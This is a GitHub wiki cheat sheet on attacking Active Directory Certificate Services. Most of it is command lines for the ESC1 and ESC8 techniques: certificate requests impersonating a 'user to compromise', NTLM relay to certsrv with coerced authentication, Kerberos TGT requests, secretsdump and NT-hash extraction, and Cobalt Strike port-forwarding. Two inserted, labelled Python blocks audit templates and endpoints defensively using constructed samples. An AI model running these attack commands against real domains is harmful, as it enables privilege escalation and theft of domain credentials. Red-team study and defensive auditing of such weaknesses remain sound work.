Active Directory Certificate Services - CraigDonkin/Infrastructure GitHub Wiki

https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf

Enumeration

LDAP search to enumerate certificate authorities

ldapsearch -x -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=<company name>,DC=<com>" -H ldap://<ip> -D <username> -W "(objectclass=pKIEnrollmentService)"

Certify

https://github.com/GhostPack/Certify

  • Enumerate certificate authorities
certify.exe cas
  • Enumerate vulnerable templates
certify.exe find /vulnerable

Certipy

certipy find -u <username> -p <password> -dc-ip <ip> 

ESC1 Attack

  • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is enabled
  • Client Authentication EKU
  • The template grants enrollment rights to domain users
  • Any domain user can request a certificate from the template for any other domain user and then use it for authentication.
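The following is an added audit example, not code from the wiki page or from Certify/Certipy. It encodes the ESC1 preconditions listed above as checks over certificate template attributes, going beyond the three bullets by also testing the two further conditions the SpecterOps whitepaper gives (no manager approval, no authorized signatures required). The attribute names and flag bits are the real template attributes; the template records are constructed samples, not data from a live directory.

```python
# Added example (not part of the wiki page or of Certify/Certipy): flag
# certificate templates that satisfy every ESC1 precondition. The sample
# records at the bottom are constructed.
from dataclasses import dataclass

# Bit in msPKI-Certificate-Name-Flag that lets the requester choose subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag that forces manager approval of every request.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that make a certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Principals that every domain account effectively belongs to.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


@dataclass
class Template:
    name: str
    name_flag: int          # msPKI-Certificate-Name-Flag
    enrollment_flag: int    # msPKI-Enrollment-Flag
    ra_signatures: int      # msPKI-RA-Signature (authorized signatures required)
    ekus: frozenset         # pKIExtendedKeyUsage OIDs; empty set means "any purpose"
    enrollers: frozenset    # principals granted the Enroll right in the template ACL


def esc1_findings(t: Template) -> list:
    """Return the ESC1 preconditions this template satisfies (ESC1 needs all five)."""
    found = []
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.append("enrollee supplies subject")
    if not t.ekus or t.ekus & AUTH_EKUS:
        found.append("authentication EKU")
    if t.enrollers & LOW_PRIV_PRINCIPALS:
        found.append("low-privileged enrollment rights")
    if not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        found.append("no manager approval")
    if t.ra_signatures == 0:
        found.append("no authorized signatures required")
    return found


def is_esc1(t: Template) -> bool:
    return len(esc1_findings(t)) == 5


def audit(templates) -> list:
    """Names of the templates that meet every ESC1 precondition."""
    return [t.name for t in templates if is_esc1(t)]


# Constructed sample records, one per outcome worth seeing.
SAMPLE_TEMPLATES = [
    # Enrollee supplies subject + Client Authentication + Domain Users can enroll.
    Template("VulnUserCert", 0x1, 0x0, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
    # Default-style User template: the subject is built from AD, not supplied.
    Template("User", 0xA6000000, 0x29, 0,
             frozenset({"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"}),
             frozenset({"Domain Users"})),
    # Enrollee supplies subject, but only Server Authentication: no logon use.
    Template("WebServer", 0x1, 0x0, 0,
             frozenset({"1.3.6.1.5.5.7.3.1"}), frozenset({"Domain Admins"})),
    # Same as VulnUserCert but every request is held for manager approval.
    Template("ApprovedUserCert", 0x1, CT_FLAG_PEND_ALL_REQUESTS, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(f"{t.name}: {'ESC1' if is_esc1(t) else 'ok'} {esc1_findings(t)}")
```

Only VulnUserCert is reported; the other three each fail exactly one precondition, which is the one a remediation should target (require a directory-built subject, drop the authentication EKU, restrict the Enroll ACE, or require manager approval).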

Certify

Certify.exe request /ca:<FQDN of certificate authority> /template:<vulnerable template> /altname:<user to compromise>

Certipy

certipy req -username <username> -password <password> -ca <certificate authority> -target <DNS hostname of CA> -template <template name> -upn <user to compromise> -ns <DNS server>

Convert certificate to pfx (Certify.exe)

  • Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file on Linux/macOS, and run the openssl command to convert it to a .pfx. When prompted, don't enter a password:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0

Use certificate to request a TGT

Rubeus.exe asktgt /user:<username> /certificate:<location of .pfx> /nowrap /ptt
Rubeus.exe asktgt /user:<username> /certificate:<base64-encoded .pfx> /nowrap /ptt

ESC8 Attack

  • HTTP enrollment interface is accessible and supports NTLM authentication
    • http://<hostname>/certsrv
  • Requires at least one certificate template that allows domain computer enrollment and client authentication
  • Relay authentication to ADCS, for example using PetitPotam against a domain controller to ntlmrelayx and then on to ADCS.
    • Use the DomainController template for a domain controller.
  • Generates a certificate for the machine account of the coerced target.
  • Use the certificate to get a TGT.
  • You cannot relay NTLM authentication back to the originating machine, so if the DC is also the CA then this is not possible.
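Added example, not code from the wiki page or from Impacket/Certipy: a small classifier for the first precondition above, the web enrollment endpoint offering NTLM over HTTP. It parses the kind of response `curl -I http://<certificate authority>/certsrv/` returns (the responses here are constructed) and reports whether the relay precondition holds, so an auditor can check a CA's endpoint without relaying anything. The URLs and hostnames are placeholders.

```python
# Added example (not from the wiki page or from Impacket/Certipy): classify an
# AD CS web enrollment endpoint's ESC8 exposure from its HTTP challenge.
# Sample responses below are constructed.

def parse_response_head(raw: str):
    """Return (status_code, headers) from a raw HTTP status line plus header block.
    Repeated headers (IIS sends one WWW-Authenticate per scheme) are kept as a list."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def esc8_exposure(url: str, raw: str) -> str:
    """Classify the endpoint:
    'relayable' - 401 offering NTLM or Negotiate over cleartext HTTP (ESC8 precondition;
                  Negotiate counts because it can fall back to NTLM)
    'check-epa' - same challenge over HTTPS; relay is only blocked if the site also
                  requires Extended Protection for Authentication, which headers can't show
    'no-ntlm'   - no NTLM/Negotiate challenge (endpoint disabled or other auth in use)
    """
    status, headers = parse_response_head(raw)
    schemes = {v.split()[0].upper() for v in headers.get("www-authenticate", []) if v}
    if status != 401 or not schemes & {"NTLM", "NEGOTIATE"}:
        return "no-ntlm"
    if url.lower().startswith("http://"):
        return "relayable"
    return "check-epa"


def audit(endpoints) -> dict:
    """Map each (url, raw_response) pair to its classification."""
    return {url: esc8_exposure(url, raw) for url, raw in endpoints}


# Constructed sample responses (placeholder hosts).
EXPOSED = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "WWW-Authenticate: NTLM\r\n"
    "Content-Length: 1293\r\n"
)
TLS_ONLY = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
)
DISABLED = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
)

if __name__ == "__main__":
    for url, verdict in audit([
        ("http://ca01.example.test/certsrv/", EXPOSED),
        ("https://ca01.example.test/certsrv/", TLS_ONLY),
        ("http://ca02.example.test/certsrv/", DISABLED),
    ]).items():
        print(f"{url}: {verdict}")
```

A 'relayable' result means the endpoint meets the NTLM-over-HTTP precondition; the remaining two conditions (a template allowing machine enrollment with client authentication, and a CA that is not the coerced host) still decide whether the chain above works.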

Manual walkthrough

https://www.youtube.com/watch?v=QUTXge-9lRo

  • See if HTTP web enrollment is enabled
    • Check for 401 Unauthorized and WWW-Authenticate: NTLM headers
curl -I http://<certificate authority>/certsrv/
  • Set up the NTLM relay
ntlmrelayx -debug -smb2support -t http://<hostname>/certsrv/certfnsh.asp --template <template name> --adcs
  • Coerce authentication to the relay (PetitPotam, Print Spooler, DFSCoerce etc.)
  • The NTLM relay will print a Base64-encoded certificate for the machine account. Save this to a file.
  • Request a TGT
gettgtpkinit.py -pfx-base64 $(cat certFile) "<domain>/<machinename>$" "<filename.ccache>" -dc-ip <DC IP>
  • Export the ccache
export KRB5CCNAME=<filename.ccache>
  • Use the Kerberos ticket with other tools such as secretsdump and getnthash.py
secretsdump -k '<domain name>/<machine account>$@<domain controller>' -debug -dc-ip <DC IP> -just-dc-user <username>
getnthash.py <domain>/<machinename>\$ -key <key from gettgtpkinit output> -dc-ip <DC IP>

Automated walkthrough - Certipy

  • Enumerate vulnerabilities
certipy find -u <username> -p <password> -dc-ip <DC IP> 
  • Run certipy with relay command
certipy relay -template <template name> -ca <CA> 
  • Coerce authentication to the machine running certipy (PetitPotam, Print Spooler, DFSCoerce etc)

  • .pfx file will be saved to the folder.

  • Run certipy with the auth command to get the NT hash for the machine account

certipy auth -pfx <pfx file> -dc-ip <DC IP>

ESC8 if CA is DC and using cobalt strike

  • If the CA is the DC then it is not possible to NTLM relay to itself.

  • Try to NTLM relay to gain access to a machine configured for unconstrained delegation

  • Setup portbender, a reverse port forward and a socks proxy to capture traffic on 445 and redirect to 8445

portbender 445 8445
rportfwd 8445 <IP of team server or localhost> 445
socks 1080
  • Run ntlmrelayx via proxychains and point to the web enrollment interface
proxychains ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
  • Coerce authentication from the target to the host you're proxying commands through
  • The output will contain the machine account certificate.
  • Use the certificate with other attacks.

ESC8 if CA is not DC and using cobalt strike

  • Repeat same steps but the certificate will work against the machine account for the DC.